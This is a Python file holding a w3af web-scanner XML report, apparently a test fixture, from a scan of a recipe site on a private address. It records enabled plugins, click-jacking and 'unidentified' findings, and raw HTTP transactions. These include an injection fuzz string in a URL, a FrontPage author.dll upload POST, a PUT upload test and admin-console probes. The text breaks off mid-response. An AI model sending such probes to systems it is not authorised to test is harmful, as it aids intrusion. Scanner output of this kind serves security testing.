# -*- coding: UTF-8 -*-
report_medium = r"""<w3afrun start="1432050466" startstr="Tue May 19 17:47:46 2015" xmloutputversion="2.0">
    <w3af-version>w3af - Web Application Attack and Audit Framework
Version: 1.6.45
Revision: unknown
Branch: unknown
Local changes: No
Author: Andres Riancho and the w3af team.</w3af-version>
    <scaninfo target="http://10.12.68.25:31337/">
        <audit>
            <plugin name="file_upload">
                <config parameter="extensions" value="[u'gif', u'html']"/>
            </plugin>
            <plugin name="eval">
                <config parameter="use_time_delay" value="True"/>
                <config parameter="use_echo" value="True"/>
            </plugin>
            <plugin name="un_ssl"/>
            <plugin name="os_commanding"/>
            <plugin name="lfi"/>
            <plugin name="sqli"/>
            <plugin name="preg_replace"/>
            <plugin name="phishing_vector"/>
            <plugin name="generic">
                <config parameter="diff_ratio" value="0.35"/>
            </plugin>
            <plugin name="format_string"/>
            <plugin name="ldapi"/>
            <plugin name="redos"/>
            <plugin name="global_redirect"/>
            <plugin name="xpath"/>
            <plugin name="cors_origin">
                <config parameter="origin_header_value" value="http://w3af.org/"/>
            </plugin>
            <plugin name="htaccess_methods"/>
            <plugin name="dav"/>
            <plugin name="ssi"/>
            <plugin name="csrf"/>
            <plugin name="xss">
                <config parameter="persistent_xss" value="True"/>
            </plugin>
            <plugin name="ssl_certificate">
                <config parameter="minExpireDays" value="30"/>
                <config parameter="caFileName" value="w3af/plugins/audit/ssl_certificate/ca.pem"/>
            </plugin>
            <plugin name="xst"/>
            <plugin name="blind_sqli">
                <config parameter="eq_limit" value="0.9"/>
            </plugin>
            <plugin name="mx_injection"/>
            <plugin name="response_splitting"/>
            <plugin name="rfi">
                <config parameter="listen_address" value=""/>
                <config parameter="listen_port" value="44449"/>
                <config parameter="use_w3af_site" value="True"/>
            </plugin>
            <plugin name="frontpage"/>
        </audit>
        <infrastructure>
            <plugin name="find_vhosts"/>
            <plugin name="afd"/>
            <plugin name="detect_transparent_proxy"/>
            <plugin name="allowed_methods">
                <config parameter="execOneTime" value="True"/>
                <config parameter="reportDavOnly" value="True"/>
            </plugin>
            <plugin name="shared_hosting"/>
            <plugin name="fingerprint_WAF"/>
            <plugin name="server_header"/>
            <plugin name="php_eggs"/>
            <plugin name="favicon_identification"/>
            <plugin name="frontpage_version"/>
            <plugin name="http_vs_https_dist">
                <config parameter="httpPort" value="80"/>
                <config parameter="httpsPort" value="443"/>
            </plugin>
            <plugin name="dns_wildcard"/>
            <plugin name="detect_reverse_proxy"/>
            <plugin name="hmap">
                <config parameter="gen_fingerprint" value="False"/>
            </plugin>
            <plugin name="domain_dot"/>
            <plugin name="fingerprint_os"/>
            <plugin name="server_status"/>
            <plugin name="find_jboss"/>
            <plugin name="halberd"/>
        </infrastructure>
        <bruteforce/>
        <grep>
            <plugin name="symfony">
                <config parameter="override" value="False"/>
            </plugin>
            <plugin name="file_upload"/>
            <plugin name="wsdl_greper"/>
            <plugin name="form_autocomplete"/>
            <plugin name="http_in_body"/>
            <plugin name="svn_users"/>
            <plugin name="xss_protection_header"/>
            <plugin name="private_ip"/>
            <plugin name="motw"/>
            <plugin name="code_disclosure"/>
            <plugin name="blank_body"/>
            <plugin name="path_disclosure"/>
            <plugin name="strange_http_codes"/>
            <plugin name="credit_cards"/>
            <plugin name="cache_control"/>
            <plugin name="dom_xss"/>
            <plugin name="cross_domain_js"/>
            <plugin name="html_comments"/>
            <plugin name="http_auth_detect"/>
            <plugin name="strange_parameters"/>
            <plugin name="oracle"/>
            <plugin name="dot_net_event_validation"/>
            <plugin name="objects"/>
            <plugin name="error_500"/>
            <plugin name="meta_tags"/>
            <plugin name="lang"/>
            <plugin name="click_jacking"/>
            <plugin name="directory_indexing"/>
            <plugin name="password_profiling"/>
            <plugin name="get_emails">
                <config parameter="only_target_domain" value="True"/>
            </plugin>
            <plugin name="hash_analysis"/>
            <plugin name="url_session"/>
            <plugin name="error_pages"/>
            <plugin name="strange_reason"/>
            <plugin name="user_defined_regex">
                <config parameter="single_regex" value=""/>
                <config parameter="regex_file_path" value=""/>
            </plugin>
            <plugin name="strange_headers"/>
            <plugin name="ssn"/>
            <plugin name="ajax"/>
            <plugin name="feeds"/>
            <plugin name="analyze_cookies"/>
        </grep>
        <evasion/>
        <output>
            <plugin name="html_file">
                <config parameter="output_file" value="current.site.html"/>
                <config parameter="verbose" value="False"/>
            </plugin>
            <plugin name="text_file">
                <config parameter="verbose" value="True"/>
                <config parameter="output_file" value="current.site.txt"/>
                <config parameter="http_output_file" value="current.site.html"/>
            </plugin>
            <plugin name="console">
                <config parameter="verbose" value="False"/>
            </plugin>
            <plugin name="xml_file">
                <config parameter="output_file" value="current.site.xml"/>
            </plugin>
        </output>
        <mangle/>
        <crawl>
            <plugin name="web_spider">
                <config parameter="only_forward" value="False"/>
                <config parameter="follow_regex" value=".*"/>
                <config parameter="ignore_regex" value=""/>
            </plugin>
            <plugin name="robots_txt"/>
            <plugin name="digit_sum"/>
            <plugin name="url_fuzzer"/>
            <plugin name="content_negotiation"/>
        </crawl>
        <auth/>
    </scaninfo>
    <vulnerability id="[238, 285, 312]" method="GET" name="Unidentified vulnerability" plugin="generic" severity="Medium" url="http://10.12.68.25:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29" var="token">
        <description>An unidentified vulnerability was found at: &quot;http://10.12.68.25:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;d'kc&quot;z'gj'&quot;**5*(((;-*`)&quot;. This vulnerability was found in the requests with ids 238, 285 and 312.</description>
        <http-transactions>
            <http-transaction id="238">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Choucroute Garnie&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;1/3 cup kosher salt, plus more for seasoning&lt;/li&gt;
        &lt;li&gt;2 tablespoons light brown sugar&lt;/li&gt;
        &lt;li&gt;3 pounds pork back ribs or baby back ribs, cut into 3 sections&lt;/li&gt;
        &lt;li&gt;6 pounds sauerkraut (in plastic bags), drained&lt;/li&gt;
        &lt;li&gt;1/4 cup duck or goose fat or peanut oil&lt;/li&gt;
        &lt;li&gt;1 large onion, coarsely chopped&lt;/li&gt;
        &lt;li&gt;4 large garlic cloves, coarsely chopped&lt;/li&gt;
        &lt;li&gt;20 juniper berries&lt;/li&gt;
        &lt;li&gt;3 large bay leaves&lt;/li&gt;
        &lt;li&gt;1/2 teaspoon caraway seeds&lt;/li&gt;
        &lt;li&gt;1 teaspoon freshly ground black pepper&lt;/li&gt;
        &lt;li&gt;3 cups chicken stock&lt;/li&gt;
        &lt;li&gt;1 1/2 cups Riesling or Pinot Gris&lt;/li&gt;
        &lt;li&gt;2 pounds Polish kielbasa, skinned and cut into 2-inch pieces&lt;/li&gt;
        &lt;li&gt;10 skinless hot dogs&lt;/li&gt;
        &lt;li&gt;One 2-pound piece of boneless boiled ham (3 to 4 inches wide), sliced 1/4 inch thick&lt;/li&gt;
        &lt;li&gt;2 pounds medium potatoes (about 10), peeled&lt;/li&gt;
        &lt;li&gt;Assorted mustards, for serving&lt;/li&gt;
    &lt;/ul&gt;

    &lt;a href='/choucroute'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="285">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/g70HkPDQ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about g70HkPDQ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='g70HkPDQ'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="312">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[238, 285, 363]" method="GET" name="Unidentified vulnerability" plugin="generic" severity="Medium" url="http://10.12.68.25:31337/" var="token">
        <description>An unidentified vulnerability was found at: &quot;http://10.12.68.25:31337/&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;&quot;. This vulnerability was found in the requests with ids 238, 285 and 363.</description>
        <http-transactions>
            <http-transaction id="238">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Choucroute Garnie&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;1/3 cup kosher salt, plus more for seasoning&lt;/li&gt;
        &lt;li&gt;2 tablespoons light brown sugar&lt;/li&gt;
        &lt;li&gt;3 pounds pork back ribs or baby back ribs, cut into 3 sections&lt;/li&gt;
        &lt;li&gt;6 pounds sauerkraut (in plastic bags), drained&lt;/li&gt;
        &lt;li&gt;1/4 cup duck or goose fat or peanut oil&lt;/li&gt;
        &lt;li&gt;1 large onion, coarsely chopped&lt;/li&gt;
        &lt;li&gt;4 large garlic cloves, coarsely chopped&lt;/li&gt;
        &lt;li&gt;20 juniper berries&lt;/li&gt;
        &lt;li&gt;3 large bay leaves&lt;/li&gt;
        &lt;li&gt;1/2 teaspoon caraway seeds&lt;/li&gt;
        &lt;li&gt;1 teaspoon freshly ground black pepper&lt;/li&gt;
        &lt;li&gt;3 cups chicken stock&lt;/li&gt;
        &lt;li&gt;1 1/2 cups Riesling or Pinot Gris&lt;/li&gt;
        &lt;li&gt;2 pounds Polish kielbasa, skinned and cut into 2-inch pieces&lt;/li&gt;
        &lt;li&gt;10 skinless hot dogs&lt;/li&gt;
        &lt;li&gt;One 2-pound piece of boneless boiled ham (3 to 4 inches wide), sliced 1/4 inch thick&lt;/li&gt;
        &lt;li&gt;2 pounds medium potatoes (about 10), peeled&lt;/li&gt;
        &lt;li&gt;Assorted mustards, for serving&lt;/li&gt;
    &lt;/ul&gt;

    &lt;a href='/choucroute'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="285">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/g70HkPDQ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about g70HkPDQ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='g70HkPDQ'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="363">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[16, 105, 106, 113, 132, 139, 174, 199, 203, 204, 206, 207, 208, 209, 213, 214, 215, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 230, 231, 232, 233, 234, 235, 236, 237, 239, 240, 241, 242, 243, 244, 245, 246, 247, 249, 250, 251, 252, 253, 255, 256, 257, 259, 262, 265, 266, 267, 268, 269, 270, 271, 273, 274, 275, 276, 277, 278, 279, 285, 287, 309, 311, 312, 314, 315, 318, 324, 326, 327, 328, 329, 330, 331, 332, 333, 336, 337, 338, 339, 340, 341, 342, 344, 345, 346, 347, 349, 350, 351, 352, 353, 354, 356, 358, 359, 360, 361, 362, 364, 365, 366, 368, 371, 374, 375, 376, 383, 388, 389, 392, 395, 404, 418, 427, 435, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 448, 450, 451, 452, 454, 455, 456, 457, 459, 461, 462, 463, 464, 467, 469, 470, 471, 472, 474, 491, 505, 513, 515, 518, 527, 531, 533, 535, 538, 540, 541, 542, 543, 546, 548, 554, 567, 577, 583, 604, 613, 645, 660, 664, 670, 686, 690, 696, 703, 704, 705, 720, 726, 730, 731, 732, 738, 749, 751, 753, 754, 759, 764, 771, 772, 773, 777, 787, 788, 803, 804, 819, 820, 835, 836, 851, 852, 864]" method="GET" name="Click-Jacking vulnerability" plugin="click_jacking" severity="Medium" url="None" var="None">
        <description>The whole target has no protection (X-Frame-Options header) against Click-Jacking attacks. This vulnerability was found in the requests with ids 16, 105 to 106, 113, 132, 139, 174, 199, 203 to 204, 206 to 209, 213 to 215, 217 to 228, 230 to 237, 239 to 247, 249 to 253, 255 to 257, 259, 262, 265 to 271, 273 to 279, 285, 287, 309, 311 to 312, 314 to 315, 318, 324, 326 to 333, 336 to 342, 344 to 347, 349 to 354, 356, 358 to 362, 364 to 366, 368, 371, 374 to 376, 383, 388 to 389, 392, 395, 404, 418, 427, 435, 438 to 448, 450 to 452, 454 to 457, 459, 461 to 464, 467, 469 to 472, 474, 491, 505, 513, 515, 518, 527, 531, 533, 535, 538, 540 to 543, 546, 548, 554, 567, 577, 583, 604, 613, 645, 660, 664, 670, 686, 690, 696, 703 to 705, 720, 726, 730 to 732, 738, 749, 751, 753 to 754, 759, 764, 771 to 773, 777, 787 to 788, 803 to 804, 819 to 820, 835 to 836, 851 to 852 and 864.</description>
        <http-transactions>
            <http-transaction id="16">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="105">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/favicon.ico HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/favicon.ico&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="106">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/_vti_inf.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_inf.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="113">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/fpujZ.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fpujZ.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="132">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/server-status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about server-status has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='server-status'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="139">
                <httprequest>
                    <status>POST http://10.12.68.25:31337/_vti_bin/_vti_aut/author.dll HTTP/1.1</status>
                    <headers>
                        <header content="158" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWV0aG9kPXB1dCBkb2N1bWVudDo0LjAuMi40NzE1JnNlcnZpY2VfbmFtZT0mZG9jdW1lbnQ9W2Rv
Y3VtZW50X25hbWU9L2ZwdWpaLmh0bWw7bWV0YV9pbmZvPVtdXSZwdXRfb3B0aW9uPW92ZXJ3cml0
ZSZjb21tZW50PSZrZWVwX2NoZWNrZWRfb3V0PWZhbHNlCmxtdGguWmp1cGY=
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_bin/_vti_aut/author.dll&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="174">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/robots.txt HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/robots.txt&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="199">
                <httprequest>
                    <status>PUT http://10.12.68.25:31337/ZjIst HTTP/1.1</status>
                    <headers>
                        <header content="6" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="text/plain" field="Content-type"/>
                    </headers>
                    <body content-encoding="text">uFwQSK</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ZjIst has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ZjIst'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="203">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/admin-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about admin-console/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='admin-console/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="204">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/jmx-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about jmx-console/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
